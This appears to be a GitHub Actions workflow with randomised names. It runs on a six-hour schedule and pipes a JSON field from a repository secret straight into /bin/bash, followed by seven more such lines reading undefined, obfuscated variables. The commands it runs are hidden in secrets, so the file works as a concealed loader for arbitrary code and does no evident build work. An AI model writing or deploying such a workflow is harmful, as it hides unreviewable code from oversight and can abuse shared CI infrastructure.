name: factorycurrently
on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: factorycurrently
        env:
          uaae4: ${{ secrets.uaae4 }}
        run: |
          echo $uaae4 | jq -r .powj0 | /bin/bash
          echo $i4787 | jq -r .iw9929 | /bin/bash
          echo $sw717 | jq -r .baec739 | /bin/bash
          echo $e5 | jq -r .exzsy0949 | /bin/bash
          echo $ij19 | jq -r .sec22589 | /bin/bash
          echo $wsy57269 | jq -r .xuvof558 | /bin/bash
          echo $kcxef6167 | jq -r .rxah42887 | /bin/bash
          echo $r0938 | jq -r .l1536 | /bin/bash

